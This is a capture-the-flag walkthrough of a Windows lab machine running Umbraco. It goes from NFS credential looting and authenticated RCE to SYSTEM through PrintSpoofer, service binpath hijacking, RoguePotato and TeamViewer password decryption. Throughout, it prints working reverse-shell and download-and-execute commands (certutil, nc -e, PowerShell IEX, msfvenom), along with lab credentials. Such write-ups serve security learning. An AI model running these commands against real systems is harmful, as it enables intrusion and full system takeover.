ENUMERATION
Nmap tcp full scan
nmap -A -p- -oN nmap_tcp_all.txt 10.10.10.180The nmap output highlighted the presence of:
- FTP on port 21:
Microsoft ftpd. Anonymous login allowed. - web server on port 80:
Microsoft HTTPAPI httpd 2.0 (SSDP/UpnP) rpcbindon port 111:2-4 (RPC #100000)msrpcon port 135,49154,49664–49667,49678–49680:Microsoft Windows RPCmountd (nfs)on port 2049:1-3 (RPC #100005)netbios-ssn,microsoft-ds? (Samba)on port 139,445winrm (Windows Remote Management)on port 5985,47001:Microsoft HTTPAPI httpd 2.0 (SSDP/UpnP)
EXPLOITATION
SMB shares listing wasn’t possible.
FTP anonymous connection was enabled, no files were available and file upload was forbidden.
NFS
showmount revealed a nfs export that could be mounted by everyone.
showmount -e 10.10.10.180
The export contained the website project backup.
mount -t nfs 10.10.10.180:/site_backups ./backups
ls showed a typical .NET application directory tree.
Web.config included the umbraco version: Umbraco 7.12.4 .
- Umbraco RCE
An authenticated RCE exploit was available for this version but I didn’t have valid credentials.
Contact sections shown a button to access the back office.
Which redirected you to the login page at http://10.10.10.180/umbraco/#/login/false?returnPath=%252Fforms.
Common default credentials like admin/admin ,admin/password didn’t work. The next step was searching for username and password within backup files.
NOTE: grepping files through the mounted export was really slow so I first created a copy of the export locally with cp -r ./backups ./remote_backup
, then I started to search both for usernames and passwords:grep -ir username, grep -ir password . A lot of results came out but I couldn’t find anything useful except for a confirmation that an admin account existed.
Several configuration files were found under /Config directory but also here I couldn’t retrieve useful credentials 🕵.
In a situation like this it’s helpful to gain information about the installed CMS/Framework to have a better understanding on where sensitive files are stored. As reported below App_Data/Umbraco.sdf should contains database credentials.
As a reminder about .NET applications structure. App_Data folder can contain interesting files as reported here:
strings ./App_Data/Umbraco.sdf revealed the following credentials: admin@htb.local username and the related password SHA1 b8be16afba8c314ad33d812f22a04991b90e2aaa .
The cleartext password is bacondandcheese .
It was time to try the exploit. The default payload consists of some xml lines which contain C# code that creates a new process using System.Diagnostics.Process class and run an arbitrary executable (calc.exe).
proc.StartInfo.FileName is the name of the executable you want to run.proc.StartInfo.Arguments stores the arguments you want to pass to the executable.
Ping test (SUCCESS)
The first attempt was pinging my system: cmd.exe /c ping -n5 10.10.16.144 .
It worked!
certutil nc.exe (FAIL)
The next step was trying to download nc.exe to C:\windows\temp directory in order to launch a reverse shell:
cmd.exe /c certutil -urlcache -split -f http://10.10.16.144/nc.exe c:\\windows\\temp\\
I didn’t get any interaction from the target…
Anyway removing the output path seemed to work...at least for the file transfer.
cmd.exe /c certutil -urlcache -split -f http://10.10.16.144/nc.exe
in fact the web server received the GET request…
…unfortunately I couldn’t run the nc.exe binary neither using cmd.exe as Filename…
cmd.exe /c .\\nc.exe -e cmd.exe 10.10.16.144 4545
nor using nc.exe as FileName 😤.
.\\nc.exe -e cmd.exe 10.10.16.144 4545
Maybe I messed with \ …
The next option to consider was using powershell.exe. A local copy of the Nishang reverse shell was created
and modified adding the invocation line at the end of the script.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.144 -Port 4545
The payload was modified as follows:
powershell.exe IEX(New-Object Net.WebClient).downloadString(\’http://10.10.16.144/Invoke-PowerShellTcp.ps1\')
Finally a reverse shell as iis apppool\defaultapppool was obtained.
PRIVILEGE ESCALATION
JuicyPotato (FAIL)
Another machine where the user had SeiImpersonatePrivilege privilege…as we already seen that means we should try JuicyPotato .
I rarely used powershell on Windows boxes, I wasn’t aware of wget. It is really handy to download files.
wget 'http://10.10.16.144/JuicyPotato.exe' -outfile .\JuicyPotato.exe
As usual I also transferred nc.exe .
Just when you think there is an easy win, things don’t work. I thought that the solution was changing the default CLSID as seen in one of the previous boxes.
A list of Windows Server 2019 CLSIDs wasn’t available.
PrintSpoofer
Searching on google for:
windows server 2019 juicypotato
provides the following link which explains in details that recent Windows version like Windows 10 and Windows Server 2019 need another way to escalate privileges. The exploit is available here.
While *Potato exploits rely on COM Storage objects and since the connection to them is now allowed only on TCP port 135 PrintSpoofer obtains token impersonation through named pipes. The exploits leverages a RPC call to a function exposed by the Print Spooler service.
Since I already transferred nc.exe I passed it to PrintSpooferas an argument in order to obtain a reverse shell as NT AUTHORITY\SYSTEM.
.\PrintSpoofer.exe -c ".\nc.exe 10.10.16.144 5454 -e cmd"
Requirements:
- Print Spooler Service must be running
- SMB Running: ports 139,445 were open
UsoSvc
Another privilege escalation vector was represented by a misconfigured service: UsoSvc .
winPEAS highlighted how the current user had full access to the service.
Since I couldn’t run sc qc using the powershell and since I’m more comfortable with cmd prompt I launched another reverse shell…
sc qc UsoSvc output showed the service configuration:
START_TYPE: AUTO_START means that the service is started at the system startup/reboot.
BINARY_PATH_NAME:C:\Windows\system32\svchost.exe -k netsvcs -p indicates the service executable path.
SERVICE_START_NAME: LocalSystem means that the service is run as SYSTEM .
sc query UsoSvc output indicates that the service is running and that can be stopped.
Since NT AUTHORITY\SERVICE group has SERVICE_ALL_ACCESS permission and…
…the current user is part of that group
I could change the service configuration.
First, a .exe reverse shell was generated and transferred to the target.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.14 LPORT=4444 -f exe > rev.exe
The executable path of the service was modified as follows:
sc config usosvc binpath="C:\windows\temp\rev.exe"
Finally the vulnerable service was stopped and started to trigger the execution of the new binary:
net stop usosvc
net start usosvcA SYSTEM reverse shell was obtained.
Rogue Potato
The third method to get SYSTEM privileges on this box. I strongly suggest you to read the writeup by 0xdf, in particular in the linked section he explains how to use RoguePotato and why it worked in the ippsec video also if it was used like JuicyPotato.
socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.180:9999
Transfer both RoguePotato.exe and RogueOxidResolver.exe on the target.
Start a listener on the attacker machine.
Run RoguePotato and receive a high privileges reverse shell.
Requirements:
- the machine can make an outbound connection on port 135
- SMB Running
- DCOM Running
If you want to dive deeper check this presentation.
TeamView7 (CVE-2019–18988)
As reported by 0xdf another PE vector was exploiting TeamViewer . Running tasklist /svc highlighted that TeamViewer7 was running.
An extract from whynotsecurity:
TL;DR: TeamViewer stored user passwords encrypted with AES-128-CBC with they key of
0602000000a400005253413100040000and iv of0100010067244F436E6762F25EA8D704in the Windows registry. If the password is reused anywhere, privilege escalation is possible.
First, AES key needs to be extracted from the registry.
Initialize hex_str_cipher with the new string and run the script (from whynotsecurity).
The cleartext is !R3m0te! .
crackmapexec
crackmapexec smb 10.10.10.180 -u administrator -p '!R3m0te!'
(Pwn3d!) means that the credentials are working for a user with admin access.
As illustrated by 0xdf there are 3 ways to get a SYSTEM reverse shell.
evil-winrm
evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
evil-winrm is WinRM shell. Remember that during the enumeration phase port 5985 was open.
psexec.py
psexec.py 'administrator:!R3m0te!@10.10.10.180'
psexec lets you execute processes on other systems. By default it tries to run cmd.exe .
wmiexec.py
wmiexec.py 'administrator:!R3m0te!@10.10.10.180'
wmiexec lets you execute commands using Windows Management Instrumentation (WMI).
EXTRA
certutil nc.exe
During my attempts with certutil I didn’t try this option because I thought I had to use \ instead of / . I was wrong. The payload works also if paths are specified with forwardslashes as shown below:
Payload to transfer nc.exe and store it in C:\windows\temp\nc.exe :
cmd.exe /c certutil -urlcache -split -f http://10.10.16.144/nc.exe c:/windows/temp/nc.exe
Payload to run the reverse shell:
cmd.exe /c C:/windows/temp/nc.exe -e cmd.exe 10.10.16.144 4545
cmd commands in powershell
Ippsec shows how you can run sc in powershell using sc.exe, for example: PS > sc.exe query <service_name> .
LESSONS LEARNED
- Before randomly reading every file of a CMS/Framework, understand how it is installed and where sensitive files are stored.
- Try both
nc.exeandpowershell.exeto obtain reverse shell. - Try both
/and\in the payload when specifying windows paths. - When using powershell specify
.exeextension to usecmdcommands:PS> sc.exe query <service_name>. wget 'http://10.10.16.144/JuicyPotato.exe' -outfile .\JuicyPotato.exepowershell "IEX(IWR http://10.10.10/rev.ps1 -UseBasicParsing)"- Starting from Windows Server 2019 and Windows 10 1809, MS fixed *Potato exploits.
PrintSpoofer,RoguePotatorepresent new ways to escalate privileges. - Misconfigured services which are started as
LoalSystemrepresent a PE vector. - Using AES with fixed key and IV to encrypt information of different user is not a good idea.
- Check for credentials reuse with
crackmapexec, evil-winrm, psexec, wmiexec.
